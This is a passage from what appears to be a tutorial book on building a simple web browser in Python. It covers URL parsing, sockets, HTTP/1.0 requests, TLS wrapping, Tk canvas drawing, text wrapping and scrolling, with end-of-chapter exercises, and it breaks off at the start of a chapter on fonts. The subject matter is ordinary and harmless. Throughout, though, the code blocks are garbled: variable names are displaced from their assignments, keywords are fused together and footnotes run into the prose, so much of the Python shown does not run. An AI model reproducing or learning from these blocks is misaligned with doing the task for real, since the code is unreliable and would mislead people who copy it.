object, and I’ll put the parsing code into the
constructor:
class URL:
def __init__(self, url):
# ...
The __init__
method is Python’s peculiar syntax for
class constructors, and the self
parameter, which you must
always make the first parameter of any method, is Python’s analog of
this
.
Let’s start with the scheme, which is separated from the rest of the
URL by ://
. Our browser only supports http
, so
I check that, too:
class URL:
def __init__(self, url):
self.scheme, url = url.split("://", 1)
assert self.scheme == "http", \
"Unknown scheme {}".format(self.scheme)
Now we must separate the host from the path. The host comes before
the first /
, while the path is that slash and everything
after it. Let’s add function that parses all parts of a URL:
class URL:
def __init__(self, url):
# ...
if "/" not in url:
= url + "/"
url self.host, url = url.split("/", 1)
self.path = "/" + url
(When you see a code block with a # ...
, like this one,
that you’re adding code to an existing method or block.) The
split(s, n)
method splits a string at the first
n
copies of s
. Note that there’s some tricky
logic here for handling the slash between the host name and the path.
That (optional) slash is part of the path.
Our browser will create a URL
object based on user
input, and then it will want to download the web page at that URL. We’ll
do that in a new method, request
:
class URL:
def request(self):
# ...
Note that you always need to write the self
parameter
for methods in Python. In the future, I won’t always make such a big
deal out of defining a method—if you see a code block with code in a
method or function that doesn’t exist yet, that means we’re defining
it.
The first step to downloading a web page is connecting to the host. The operating system provides a feature called “sockets” for this. When you want to talk to other computers (either to tell them something, or to wait for them to tell you something), you create a socket, and then that socket can be used to send information back and forth. Sockets come in a few different kinds, because there are multiple ways to talk to other computers:
AF
. We want AF_INET
, but for example
AF_BLUETOOTH
is another.SOCK
. We want SOCK_STREAM
, which means each
computer can send arbitrary amounts of data over, but there’s also
SOCK_DGRAM
, in which case they send each other packets of
some fixed size.The
DGRAM
stands for “datagram” and think of it like a
postcard.IPPROTO_TCP
.Newer versions of HTTP use
something called QUIC
instead of TCP, but our browser will stick to HTTP
1.0.By picking all of these options, we can create a socket like so:While this code uses the
Python socket
library, your favorite language likely
contains a very similar library. This API is basically standardized. In
Python, the flags we pass are defaults, so you can actually call
socket.socket()
; I’m keeping the flags here in case you’re
following along in another language.
import socket
class URL:
def request(self):
= socket.socket(
s =socket.AF_INET,
familytype=socket.SOCK_STREAM,
=socket.IPPROTO_TCP,
proto )
Once you have a socket, you need to tell it to connect to the other computer. For that, you need the host and a port. The port depends on the type of server you’re connecting to; for now it should be 80.
class URL:
def request(self):
# ...
connect((self.host, 80)) s.
This talks to example.org
to set up the connection and
ready both computers to exchange data.
Naturally this won’t work if you’re offline. It also might not work if you’re behind a proxy, or in a variety of more complex networking environments. The workaround will depend on your setup—it might be as simple as disabling your proxy, or it could be much more complex.
Note that there are two parentheses in the connect
call:
connect
takes a single argument, and that argument is a
pair of a host and a port. This is because different address families
have different numbers of arguments.
You can find out more about the “sockets” API on Wikipedia. Python more or less implements that API directly.
Now that we have a connection, we make a request to the other server.
To do so, we send it some data using the send
method:
class URL:
def request(self):
# ...
"GET {} HTTP/1.0\r\n".format(self.path) + \
s.send(("Host: {}\r\n\r\n".format(self.host)) \
"utf8")) .encode(
There are a few things to note here that have to be exactly right.
First, it’s very important to use \r\n
instead of
\n
for newlines. It’s also essential that you put
two newlines \r\n
at the end, so that you send
that blank line at the end of the request. If you forget that, the other
computer will keep waiting on you to send that newline, and you’ll keep
waiting on its response.Computers are endlessly literal-minded.
Also note the encode
call. When you send data, it’s
important to remember that you are sending raw bits and bytes; they
could form text or an image or video. But a Python string is
specifically for representing text. The encode
method
converts text into bytes, and there’s a corresponding
decode
method that goes the other way.When you call
encode
and decode
you need to tell the
computer what character encoding you want it to use. This is a
complicated topic. I’m using utf8
here, which is a common
character encoding and will work on many pages, but in the real world
you would need to be more careful. Python reminds you to
be careful by giving different types to text and to bytes:
>>> type("text")
<class 'str'>
>>> type("text".encode("utf8"))
<class 'bytes'>
If you see an error about str
versus bytes
,
it’s because you forgot to call encode
or
decode
somewhere.
Finally, send
just sends the request to the server.send
actually
returns a number, in this case 47
. That tells you how many
bytes of data you sent to the other computer; if, say, your network
connection failed midway through sending the data, you might want to
know how much you sent before the connection failed. To
read its response, you’d generally use the read
function on
sockets, which gives whatever bits of the response have already arrived.
Then you write a loop that collects bits of the response as they arrive.
However, in Python you can use the makefile
helper
function, which hides the loop:If you’re in another language, you might only have
socket.read
available. You’ll need to write the loop,
checking the socket status, yourself.
class URL:
def request(self):
# ...
= s.makefile("r", encoding="utf8", newline="\r\n") response
Here makefile
returns a file-like object containing
every byte we receive from the server. I am instructing Python to turn
those bytes into a string using the utf8
encoding,
or method of associating bytes to letters.Hard-coding utf8
is not correct, but it’s a shortcut that will work alright on most
English-language websites. In fact, the Content-Type
header
usually contains a charset
declaration that specifies
encoding of the body. If it’s absent, browsers still won’t default to
utf8
; they’ll guess, based on letter frequencies, and you
see ugly � strange áççêñ£ß when they guess wrong. Incorrect-but-common
utf8
skips all that complexity. I’m also
informing Python of HTTP’s weird line endings.
Let’s now split the response into pieces. The first line is the status line:
class URL:
def request(self):
# ...
= response.readline()
statusline = statusline.split(" ", 2)
version, status, explanation assert status == "200", "{}: {}".format(status, explanation)
Note that I do not check that the server’s version of HTTP is the same as mine; this might sound like a good idea, but there are a lot of misconfigured servers out there that respond in HTTP 1.1 even when you talk to them in HTTP 1.0.Luckily the protocols are similar enough to not cause confusion.
After the status line come the headers:
class URL:
def request(self):
# ...
= {}
headers while True:
= response.readline()
line if line == "\r\n": break
= line.split(":", 1)
header, value = value.strip() headers[header.lower()]
For the headers, I split each line at the first colon and fill in a map of header names to header values. Headers are case-insensitive, so I normalize them to lower case. Also, white-space is insignificant in HTTP header values, so I strip off extra whitespace at the beginning and end.
Headers can describe all sorts of information, but a couple of headers are especially important because they tell us that the data we’re trying to access is being sent in an unusual way. Let’s make sure none of those are present:The “compression” exercise at the end of this chapter describes how your browser should handle these headers if they are present.
class URL:
def request(self):
# ...
assert "transfer-encoding" not in headers
assert "content-encoding" not in headers
The usual way to send the data, then, is everything after the headers:
class URL:
def request(self):
# ...
= response.read()
body s.close()
It’s that body that we’re going to display, so let’s return that. Let’s also return the headers, in case they are useful to someone:
class URL:
def request(self):
# ...
return headers, body
Now let’s actually display the text in the response body.
The Content-Encoding
header lets the server compress web pages before sending them. Large,
text-heavy web pages compress well, and as a result the page loads
faster. The browser needs to send an Accept-Encoding
header in its request to list compression algorithms it supports. Transfer-Encoding
is similar and also allows the data to be “chunked”, which many servers
seem to use together with compression.
The HTML code in the body defines the content you see in your browser window when you go to http://example.org/index.html. I’ll be talking much, much more about HTML in future chapters, but for now let me keep it very simple.
In HTML, there are tags and text. Each tag starts
with a <
and ends with a >
; generally
speaking, tags tell you what kind of thing some content is, while text
is the actual content.That said, some tags, like img
, are content,
not information about it. Most tags come in pairs of a
start and an end tag; for example, the title of the page is enclosed in
a pair of tags: <title>
and
</title>
. Each tag, inside the angle brackets, has a
tag name (like title
here), and then optionally a space
followed by attributes, and its pair has a /
followed by the tag name (and no attributes). Some tags do not have
pairs, because they don’t surround text, they just carry information.
For example, on http://example.org/index.html, there is the tag:
<meta charset="utf-8" />
This tag explains that the character set with which to interpret the
page body is utf-8
. Sometimes, tags that don’t contain
information end in a slash, but not always; it’s a matter of
preference.
The most important HTML tag is called <body>
(with
its pair, </body>
). Between these tags is the content
of the page; outside of these tags is various information about the
page, like the aforementioned title, information about how the page
should look (<style>
and
</style>
), and metadata (the aforementioned
<meta>
tag).
So, to create our very, very simple web browser, let’s take the page
HTML and print all the text, but not the tags, in it:If this example causes Python
to produce a SyntaxError
pointing to the end
on the last line, it is likely because you are running Python 2 instead
of Python 3. These chapters assume Python 3.
= False
in_angle for c in body:
if c == "<":
= True
in_angle elif c == ">":
= False
in_angle elif not in_angle:
print(c, end="")
This code is pretty complex. It goes through the request body
character by character, and it has two states: in_angle
,
when it is currently between a pair of angle brackets, and
not in_angle
. When the current character is an angle
bracket, it changes between those states; normal characters not inside a
tag, are printed.The
end
argument tells Python not to print a newline after the
character, which it otherwise would.
Let’s put this code into a new function, show
:
def show(body):
# ...
We can now load a web page just by stringing together
request
and show
:
def load(url):
= url.request()
headers, body show(body)
Add the following code to run load
from the command
line:
if __name__ == "__main__":
import sys
1])) load(URL(sys.argv[
This is Python’s version of a main
function—it reads the
first argument (sys.argv[1]
) from the command line and uses
it as a URL. Try running this code on the URL
http://example.org/
:
python3 browser.py http://example.org/
You should see some short text welcoming you to the official example web page. You can also try using it on this chapter!
So far, our browser supports the http
scheme. That’s
pretty good: it’s the most common scheme on the web today. But more and
more, websites are migrating to the https
scheme. I’d like
this toy browser to support https
because many websites
today require it.
The difference between http
and https
is
that https
is more secure—but let’s be a little more
specific. The https
scheme, or more formally HTTP over TLS,
is identical to the normal http
scheme, except that all
communication between the browser and the host is encrypted. There are
quite a few details to how this works: which encryption algorithms are
used, how a common encryption key is agreed to, and of course how to
make sure that the browser is connecting to the correct host.
Luckily, the Python ssl
library implements all of these
details for us, so making an encrypted connection is almost as easy as
making a regular connection. That ease of use comes with accepting some
default settings which could be inappropriate for some situations, but
for teaching purposes they are fine.
Making an encrypted connection with ssl
is pretty easy.
Suppose you’ve already created a socket, s
, and connected
it to example.org
. To encrypt the connection, you use
ssl.create_default_context
to create a context
ctx
and use that context to wrap the socket
s
. That produces a new socket, s
:
import ssl
= ssl.create_default_context()
ctx = ctx.wrap_socket(s, server_hostname=host) s
When you wrap s
, you pass a server_hostname
argument, and it should match the Host
header. Note that I
save the new socket back into the s
variable. That’s
because you don’t want to send over the original socket; it would be
unencrypted and also confusing.
On macOS, you’ll need to run
a program called “Install Certificates” before you can use Python’s
ssl
package on most websites.
Let’s try to take this code and add it to request
.
First, we need to detect which scheme is being used:
class URL:
def __init__(self, url):
self.scheme, url = url.split("://", 1)
assert self.scheme in ["http", "https"], \
"Unknown scheme {}".format(self.scheme)
# ...
(Note that here you’re supposed to replace the existing scheme parsing code with this new code. It’s usually clear from context and the code itself what you need to replace.)
Encrypted HTTP connections usually use port 443 instead of port 80:
class URL:
def __init__(self, url):
# ...
if self.scheme == "http":
self.port = 80
elif self.scheme == "https":
self.port = 443
We can use that port when creating the socket:
class URL:
def request(self):
# ...
connect((self.host, self.port))
s.# ...
Next, we’ll wrap the socket with the ssl
library:
class URL:
def request(self):
# ...
if self.scheme == "https":
= ssl.create_default_context()
ctx = ctx.wrap_socket(s, server_hostname=self.host)
s # ...
Your browser should now be able to connect to HTTPS sites.
While we’re at it, let’s add support for custom ports, which are specified in a URL by putting a colon after the host name:
http://example.org:8080/index.html
If the URL has a port we can parse it out and use it:
class URL:
def __init__(self, url):
# ...
if ":" in self.host:
self.host, port = self.host.split(":", 1)
self.port = int(port)
Custom ports are handy for debugging. Python has a built-in web server you can use to serve files on your computer. For example, if you run
python3 -m http.server 8000
from some directory, then going to
http://localhost:8000/
should show you all the files in
that directory. This is going to be a good way to test your browser.
TLS is pretty complicated. You can read the details in RFC 8446, but implementing your own is not recommended. It’s very difficult to write a custom TLS implementation that is not only correct but secure.
This chapter went from an empty file to a rudimentary web browser that can:
sockets
and
ssl
librariesHost
headerYes, this is still more of a command-line tool than a web browser, but it already has some of the core capabilities of a browser.
The complete set of functions, classes, and methods in our browser should look something like this:
class URL:
def __init__(url)
def request()
def show(body)
def load(url)
if __name__ == "__main__"
Alternate encodings: add support for a non-utf8
value for Content-Type
. Test it on a real site such as
google.com
(which doesn’t use utf8
).
HTTP/1.1: Along with Host
, send the
Connection
header in the request
function with
the value close
. Your browser can now declare that it is
using HTTP/1.1
. Also add a User-Agent
header.
Its value can be whatever you want—it identifies your browser to the
host. Make it easy to add further headers in the future.
File URLs: Add support for the file
scheme,
which allows the browser to open local files. For example,
file:///path/goes/here
should refer to the file on your
computer at location /path/goes/here
. Also make it so that,
if your browser is started without a URL being given, some specific file
on your computer is opened. You can use that file for quick testing.
data: Yet another scheme is data, which allows
inlining HTML content into the URL itself. Try navigating to
data:text/html,Hello world!
in a real browser to see what
happens. Add support for this scheme to your browser. The data
scheme is especially convenient for making tests without having to put
them in separate files.
Body tag: Only show text in an HTML document if it is
between <body>
and </body>
. This
avoids printing the title and style information. Try to do this in a
single pass through the document—that means not using string methods
like split
or similar. The loop in show
will
need more variables to track tag names.
Entities: Implement support for the less-than
(<
) and greater-than (>
)
entities. These should be printed as <
and
>
, respectively. For example, if the HTML response was
<div>
, the show
method of your
browser should print <div>
. Entities allow web pages
to include these special characters without the browser interpreting
them as tags.
view-source: In addition to HTTP and HTTPS, there are other
schemes, such as view-source; navigating in a real browser to
view-source:http://browser.engineering/http.html
shows the
HTML source of this chapter rather than its rendered output. Add support
for the view-source scheme. Your browser should print the entire HTML
file as if it was text. Hint: To do so, you can utilize the
entities from the previous exercise, and add an extra
transform()
method that adjusts the input to
show()
when in view-source mode, like this:
show(transform(body))
.
Compression: Add support for HTTP compression, in which the
browser informs
the server that compressed data is acceptable. Your browser must
send the Accept-Encoding
header with the value
gzip
. If the server supports compression, its response will
have a Content-Encoding
header with value
gzip
. The body is then compressed. Add support for this
case. To decompress the data, you can use the decompress
method in the gzip
module. Calling makefile
with the encoding
argument will no longer work, because
compressed data is not utf8
-encoded. You can change the
first argument "rb"
to work with raw bytes instead of
encoded text. Most web servers send compressed data in a
Transfer-Encoding
called chunked
.
You’ll need to add support for that, too, to access most web servers
that support compressed data.There’s also a couple of Transfer-Encoding
s
that compress the data. Those aren’t commonly used.
Redirects: Error codes in the 300 range request a redirect.
When your browser encounters one, it should make a new request to the
URL given in the Location
header. Sometimes the
Location
header is a full URL, but sometimes it skips the
host and scheme and just starts with a /
(meaning the same
host and scheme as the original request). The new URL might itself be a
redirect, so make sure to handle that case. You don’t, however, want to
get stuck in a redirect loop, so make sure limit how many redirects your
browser can follow in a row. You can test this with the URL http://browser.engineering/redirect, which redirects
back to this page.
Caching: Typically the same images, styles, and scripts are
used on multiple pages; downloading them repeatedly is a waste. It’s
generally valid to cache any HTTP response, as long as it was requested
with GET
and received a 200
response.Some other status codes like
301
and 404
can also be cached.
Implement a cache in your browser and test it by requesting the same
file multiple times. Servers control caches using the
Cache-Control
header. Add support for this header,
specifically for no-store
and max-age
values.
If the Cache-Control
header contains any other value than
these two, it’s best not to cache the response.
A web browser doesn’t just download a web page; it also has to show
that page to the user. In the 21st century, that means a
graphical application. How does that work? In this chapter we’ll equip
the toy browser with a graphical user interface.There are some obscure
text-based browsers: I used w3m
as my main browser for most
of 2011. I don’t anymore.
Desktop and laptop computers run operating systems that provide desktop environments: windows, buttons, and a mouse. So programs don’t directly draw to the screen; the desktop environment controls the screen. Instead:
Though the desktop environment is responsible for displaying the window, the program is responsible for drawing its contents. Applications have to redraw these contents quickly for interactions to feel fluid,On older systems, applications drew directly to the screen, and if they didn’t update, whatever was there last would stay in place, which is why in error conditions you’d often have one window leave “trails” on another. Modern systems use a technique called compositing, in part to avoid trails (performance and application isolation are additional reasons). Even while using compositing, applications must redraw their window contents to change what is displayed. Chapter 13 will discuss compositing in more detail. and must respond quickly to clicks and key presses so the user doesn’t get frustrated.
“Feel fluid” can be made more precise. Graphical applications such as browsers typically aim to redraw at a speed equal to the refresh rate, or frame rate, of the screen, and/or a fixed 60HzMost screens today have a refresh rate of 60Hz, and that is generally considered fast enough to look smooth. However, new hardware is increasingly appearing with higher refresh rates, such as 120Hz. Sometimes rendering engines, games in particular, refresh at lower rates on purpose if they know the rendering speed can’t keep up.. This means that the browser has to finish all its work in less than 1/60th of a second, or 16ms, in order to keep up. For this reason, 16ms is called the animation frame budget of the application.
You should also keep in mind that not all web page interactions are animations - there are also discrete actions such as mouse clicks. Research has shown that it usually suffices to respond to a discrete action in 100ms - below that threshold, most humans are not sensitive to discrete action speed. This is very different than interactions such as scroll, where speed less than 60Hz or so is quite noticeable. The difference between the two has to do with the way the human mind processes movement (animation) versus discrete action, and the time it takes for the brain to decide upon such an action, execute it, and understand its result.
Doing all of this by hand is a bit of a drag, so programs usually use a graphical toolkit to simplify these steps. These toolkits allow you to describe your program’s window in terms of widgets like buttons, tabs, or text boxes, and take care of drawing and redrawing the window contents to match that description.
Python comes with a graphical toolkit called Tk using the Python
package tkinter
.The library is called Tk, and it was originally written for
a different language called Tcl. Python contains an interface to it,
hence the name. Using it is quite simple:
import tkinter
= tkinter.Tk()
window tkinter.mainloop()
Here tkinter.Tk()
creates a window and
tkinter.mainloop()
starts the process of redrawing the
screen. Inside Tk, tkinter.Tk()
asks the desktop
environment to create the window and returns its identifier, while
tkinter.mainloop()
enters a loop that looks similar to this
The example event loop
above may look like an infinite loop that locks up the computer, but
it’s not, because of preemptive multitasking among threads and processes
and/or a variant of the event loop that sleeps unless it has inputs that
wake it up from another thread or process.:
while True:
for evt in pendingEvents():
handleEvent(evt) drawScreen()
Here, drawScreen
draws the various widgets,
pendingEvent
asks the desktop environment for recent mouse
clicks or key presses, and handleEvent
calls into library
user code in response to that event. This event loop pattern is
common in many applications, from web browsers to video games. A simple
window does not need much event handling (it ignores all events) or much
drawing (it is a uniform white or gray). But in more complex graphical
applications the event loop pattern makes sure that all events are
eventually handled and the screen is eventually updated, both essential
to a good user experience.
Tk’s event loop is the Tk_UpdateObjCmd
function, found
in tkCmds.c
,
which calls XSync
to redraw the screen and
Tcl_DoOneEvent
to handle an event. There’s also a lot of
code to handle errors.
Our toy browser will draw the web page text to a canvas, a
rectangular Tk widget that you can draw circles, lines, and text
in.You may be familiar
with the HTML <canvas>
element, which is a similar
idea: a 2D rectangle in which you can draw shapes. Tk also
has widgets like buttons and dialog boxes, but our browser won’t use
them: we will need finer-grained control over appearance, which a canvas
provides:This is why
desktop applications are more uniform than web pages: desktop
applications generally use the widgets provided by a common graphical
toolkit, which limits their creative possibilities.
= 800, 600
WIDTH, HEIGHT = tkinter.Tk()
window = tkinter.Canvas(window, width=WIDTH, height=HEIGHT)
canvas canvas.pack()
The first line creates the window, as above; the second creates the
Canvas
inside that window. We pass the window as an
argument, so that Tk knows where to display the canvas, and some
arguments that define the canvas’s size; I chose 800×600 because that
was a common old-timey monitor size.This size, called Super Video Graphics Array, was
standardized in 1987, and probably did seem super back
then. The third line is a Tk peculiarity, which positions
the canvas inside the window.
There’s going to be a window, a canvas, and later some other things, so to keep it all organized let’s make an object:
class Browser:
def __init__(self):
self.window = tkinter.Tk()
self.canvas = tkinter.Canvas(
self.window,
=WIDTH,
width=HEIGHT
height
)self.canvas.pack()
Once you’ve made a canvas, you can call methods that draw shapes on
the canvas. Let’s do that inside load
, which we’ll move
into the new Browser
class:
class Browser:
def load(self, url):
# ...
self.canvas.create_rectangle(10, 20, 400, 300)
self.canvas.create_oval(100, 100, 150, 150)
self.canvas.create_text(200, 150, text="Hi!")
To run this code, create a Browser
, call
load
, and then start the Tk mainloop
:
if __name__ == "__main__":
import sys
1]))
Browser().load(URL(sys.argv[ tkinter.mainloop()
You ought to see: a rectangle, starting near the top-left corner of the canvas and ending at its center; then a circle inside that rectangle; and then the text “Hi!” next to the circle.
Coordinates in Tk refer to X positions from left to right and to Y positions from top to bottom. In other words, the bottom of the screen has larger Y values, the opposite of what you might be used to from math. Play with the coordinates above to figure out what each argument refers to.The answers are in the online documentation.
The Tk canvas widget is quite a bit more powerful than what we’re using it for here. As you can see from the tutorial, you can move the individual things you’ve drawn to the canvas, listen to click events on each one, and so on. In this book, I’m not using those features, because I want to teach you how to implement them.
Let’s draw a simple web page on this canvas. So far, the toy browser steps through the web page source code character by character and prints the text (but not the tags) to the console window. Now we want to draw the characters on the canvas instead.
To start, let’s change the show
function from the
previous chapter into a function that I’ll call lex
Foreshadowing future
developments… which just returns the
text-not-tags content of an HTML document, without printing it:
def lex(body):
= ""
text # ...
for c in body:
# ...
elif not in_angle:
+= c
text return text
Then, load
will draw that text, character by
character:
def load(self, url):
# ...
for c in text:
self.canvas.create_text(100, 100, text=c)
Let’s test this code on a real webpage. For reasons that might seem
inscrutableIt’s to delay
a discussion of basic typography to the next chapter…,
let’s test it on the first chapter of
西游记 or “Journey to the West”, a classic
Chinese novel about a monkey. Run this URLRight click on the link and
“Copy URL”. through request
,
lex
, and load
.If you’re not in Asia, you’ll
probably see this phase take a while: China is far away!
You should see a window with a big blob of black pixels inset a bit from
the top left corner of the window.
Why a blob instead of letters? Well, of course, because we are drawing every letter in the same place, so they all overlap! Let’s fix that:
= 13, 18
HSTEP, VSTEP = HSTEP, VSTEP
cursor_x, cursor_y for c in text:
self.canvas.create_text(cursor_x, cursor_y, text=c)
+= HSTEP cursor_x
The variables cursor_x
and cursor_y
point
to where the next character will go, as if you were typing the text with
in a word processor. I picked the magic numbers—13 and 18—by trying a
few different values and picking one that looked most readable. In the
next chapter, we’ll replace magic numbers with
font metrics.
The text now forms a line from left to right. But with an 800 pixel wide canvas and 13 pixels per character, one line only fits about 60 characters. You need more than that to read a novel, so we also need to wrap the text once we reach the edge of the screen:
for c in text:
# ...
if cursor_x >= WIDTH - HSTEP:
+= VSTEP
cursor_y = HSTEP cursor_x
The code increases cursor_y
and resets
cursor_x
In
the olden days of typewriters, increasing y meant
feeding in a new line, and resetting x meant
returning the carriage that printed letters to the
left edge of the page. So ASCII standardizes two separate
characters—“carriage return” and “line feed”—for these operations, so
that ASCII could be directly executed by teletypewriters. That’s why
headers in HTTP are separated by \r\n
, even though modern
computers have no mechanical carriage. once
cursor_x
goes past 787 pixels.Not 800, because we started at
pixel 13 and I want to leave an even gap on both sides.
Wrapping the text this way makes it possible to read more than a single
line:
Now we can read a lot of text, but still not all of it: if there’s enough text, all of the lines of text don’t fit on the screen. We want users to scroll the page to look at different parts of it.
Chinese characters are usually, but not always, independent: 开关 means “button” but is composed of 开 “on” and 关 “off”. A line break between them would be confusing, because you’d read “on off” instead of “button”. The ICU library, used by both Firefox and Chrome, uses dynamic programming to guess phrase boundaries based on a word frequency table.
Scrolling introduces a layer of indirection between page coordinates (this text is 132 pixels from the top of the page) and screen coordinates (since you’ve scrolled 60 pixels down, this text is 72 pixels from the top of the screen). Generally speaking, a browser lays out the page—determines where everything on the page goes—in terms of page coordinates and then renders the page—draws everything—in terms of screen coordinates.Sort of. What actually happens is that the page is first drawn into a bitmap or GPU texture, then that bitmap/texture is shifted according to the scroll, and the result is rendered to the screen. Chapter 12 will have more on this topic.
Our browser will have the same split. Right now load
both computes the position of each character and draws it: layout and
rendering. Let’s have a layout
function to compute and
store the position of each character, and a separate draw
function to then draw each character based on the stored position. This
way, layout
can operate with page coordinates and only
draw
needs to think about screen coordinates.
Let’s start with layout
. Instead of calling
canvas.create_text
on each character let’s add it to a
list, together with its position. Since layout
doesn’t need
to access anything in Browser
, it can be a standalone
function:
def layout(text):
= []
display_list = HSTEP, VSTEP
cursor_x, cursor_y for c in text:
display_list.append((cursor_x, cursor_y, c))# ...
return display_list
The resulting list is called a display list: it is a list of
things to display.The
term is standard. Since layout
is all about
page coordinates, we don’t need to change anything else about it to
support scrolling.
Once the display list is computed, draw
needs to loop
through the display list and draw each character:
class Browser:
def draw(self):
for x, y, c in self.display_list:
self.canvas.create_text(x, y, text=c)
Since draw
does need access to the canvas, we keep it a
method on Browser
. Now the load
just needs to
call layout
followed by draw
:
class Browser:
def load(self, url):
= url.request()
headers, body = lex(body)
text self.display_list = layout(text)
self.draw()
Now we can add scrolling. Let’s have a variable for how far you’ve scrolled:
class Browser:
def __init__(self):
# ...
self.scroll = 0
The page coordinate y
then has screen coordinate
y - self.scroll
:
def draw(self):
for x, y, c in self.display_list:
self.canvas.create_text(x, y - self.scroll, text=c)
If you change the value of scroll
the page will now
scroll up and down. But how does the user change
scroll
?
Storing the display list makes scrolling faster: the browser isn’t
doing layout
every time you scroll. Modern browsers take
this further, retaining much of the display list even when the web
page changes due to JavaScript or user interaction.
Most browsers scroll the page when you press the up and down keys, rotate the scroll wheel, drag the scroll bar, or apply a touch gesture to the screen. To keep things simple, let’s just implement the down key.
Tk allows you to bind a function to a key, which instructs Tk to call that function when the key is pressed. For example, to bind to the down arrow key, write:
def __init__(self):
# ...
self.window.bind("<Down>", self.scrolldown)
Here, self.scrolldown
is an event handler, a
function that Tk will call whenever the down arrow key is pressed.scrolldown
is
passed an event object as an argument by Tk, but since
scrolling down doesn’t require any information about the key press,
besides the fact that it happened, scrolldown
ignores that
event object. All it needs to do is increment
y
and re-draw the canvas:
= 100
SCROLL_STEP
def scrolldown(self, e):
self.scroll += SCROLL_STEP
self.draw()
If you try this out, you’ll find that scrolling draws all the text a
second time. That’s because we didn’t erase the old text before drawing
the new text. Call canvas.delete
to clear the old text:
def draw(self):
self.canvas.delete("all")
# ...
Scrolling should now work!
But this scrolling is pretty slow.How fast exactly seems to depend a lot on your operating
system and default font. Why? It turns out that loading
information about the shape of a character, inside
create_text
, takes a while. To speed up scrolling we need
to make sure to do it only when necessary (while at the same time
ensuring the pixels on the screen are always correct).
Real browsers incorporate a lot of quite tricky optimizations to this
process, but for this toy browser let’s limit ourselves to a simple
improvement: on a long page most characters are outside the viewing
window, and we can skip drawing them in draw
:
for x, y, c in self.display_list:
if y > self.scroll + HEIGHT: continue
if y + VSTEP < self.scroll: continue
# ...
The first if
statement skips characters below the
viewing window; the second skips characters above it. In that second
if
statement, y + VSTEP
computes the bottom
edge of the character, so that characters that are halfway inside the
viewing window are still drawn.
Scrolling should now be pleasantly fast, and hopefully well within
the 16ms animation frame budget. And because we split
layout
and draw
, we don’t need to change
layout
at all to implement this optimization.
Though you’re probably writing your browser on a desktop computer, many people access the web through mobile devices such as phones or tablets. On mobile devices, there’s still a screen, a rendering loop, and most other things discussed in this book.For example, most real browsers have both desktop and mobile editions, and the rendering engine code is almost exactly the same for both. But there are several differences worth noting:
<head>
you’ll see a “viewport”
<meta>
tag. This tag gives instructions to the
browser for how to handle zooming on a mobile device. Without this tag,
the browser makes assumptions, for historical reasons, that the site is
“desktop-only” and needs some special tricks to make it readable on a
mobile device, such as allowing the user to use a pinch-zoom or
double-tap touchscreen gesture to focus in on one part of the page. Once
zoomed in, the part of the page visible on the screen is the “visual
viewport” and the whole documents’ bounds are the “layout
viewport”.This chapter went from a rudimentary command-line browser to a graphical user interface with text that can be scrolled. The browser now:
Next, we’ll make this browser work on English text, with all its complexities of variable width characters, line layout, and formatting.
The complete set of functions, classes, and methods in our browser should look something like this:
class URL:
def __init__(url)
def request()
def lex(body)
WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
def layout(text)
class Browser:
def __init__()
def load(url)
def draw()
def scrolldown(e)
if __name__ == "__main__"
Line breaks: Change layout
to end the current
line and start a new one when it sees a newline character. Increment
y by more than VSTEP
to give the illusion of
paragraph breaks. There are poems embedded in “Journey to the West”;
you’ll now be able to make them out.
Mouse wheel: Add support for scrolling up when you hit the
up arrow. Make sure you can’t scroll past the top of the page.It’s harder to stop scrolling
past the bottom of the page; we will implement this in Chapter 5 Then bind the
<MouseWheel>
event, which triggers when you scroll
with the mouse wheel.It
will also trigger with touchpad gestures, if you don’t have a
mouse. The associated event object has an
event.delta
value which tells you how far and in what
direction to scroll. Unfortunately, Mac and Windows give the
event.delta
objects opposite sign and different scales, and
on Linux, scrolling instead uses the <Button-4>
and
<Button-5>
events.The Tk
manual has more information about this. It’s not easy to write
cross-platform applications!
Emoji: Add support for emoji to our browser. Emoji are
characters, and you can call create_text
to draw them, but
the results aren’t very good. Instead, head to the OpenMoji project, download the emoji
for “grinning
face” as a PNG file, convert to GIF, resize it to 16×16 pixels, and
save it to the same folder as the browser. Use Tk’s
PhotoImage
class to load the image and then the
create_image
method to draw it to the canvas. In fact,
download the whole OpenMoji library (look for the “Get OpenMojis” button
at the top right)—then your browser can look up whatever emoji is used
in the page.
Resizing: Make the browser resizable. To do so, pass the
fill
and expand
arguments to
canvas.pack
, call and bind to the
<Configure>
event, which happens when the window is
resized. The window’s new width and height can be found in the
width
and height
fields on the event object.
Remember that when the window is resized, the line breaks must change,
so you will need to call layout
again.
Zoom: Make the +
key double the text size. You
will need to use the font
argument in
create_text
to change the size of text, like this:
= tkinter.font.Font(size=32)
font 200, 150, text="Hi!", font=font) canvas.create_text(
Be careful in how you split the task between layout
and
draw
. Make sure that text doesn’t overlap when you zoom in
and that scrolling works when zoomed in.
In the last chapter, your web browser created a graphical window and drew a grid of characters to it. That’s OK for Chinese, but English text features characters of different widths and words that you can’t break across lines.There are lots of languages in the world, and lots of typographic conventions. A real web browser supports every language from Arabic to Zulu, but this book focuses on English. Text is near-infinitely complex, but this book cannot be infinitely long! In this chapter, we’ll add those capabilities. You’ll be able to read this page in your browser!
So far, we’ve called create_text
with a character and
two coordinates to write text to the screen. But we never specified the
font, the size, or the color. To talk about those things, we need to
create and use font objects.
What is a font, exactly? Well, in the olden days, printers arranged little metal slugs on rails, covered them with ink, and pressed them to a sheet of paper, creating a printed page. The metal shapes came in boxes, one per letter, so you’d have a (large) box of e’s, a (small) box of x’s, and so on. The boxes came in cases (one for uppercase and one for lowercase letters). The set of cases was called a font.The word is related to foundry, which would create the little metal shapes. Naturally, if you wanted to print larger text, you needed different (bigger) shapes, so those were a different font; a collection of fonts was called a type, which is why we call it typing. Variations—like bold or italic letters—were called that type’s “faces”.
This nomenclature reflects the world of the printing press: metal shapes in boxes in cases of different types. Our modern world instead has dropdown menus, and the old words no longer match it. “Font” can now mean font, typeface, or type,Let alone “font family”, which can refer to larger or smaller collections of types. and we say a font contains several different weights (like “bold” and “normal”),But sometimes other weights as well, like “light”, “semibold”, “black”, and “condensed”. Good fonts tend to come in many weights. several different styles (like “italic” and “roman”, which is what not-italic is called),Sometimes there are other options as well, like maybe there’s a small-caps version; these are sometimes called options as well. And don’t get me started on automatic versus manual italics. and arbitrary sizes.Font looks especially good at certain sizes where hints tell the computer how to best to align it to the pixel grid. Welcome to the world of magic ink.
Yet Tk’s font objects correspond to the older meaning of
font: a type at a fixed size, style, and weight. For example:You can only create
Font
objects, or any other kinds of Tk objects, after
calling tkinter.Tk()
, which is why I’m putting this code in
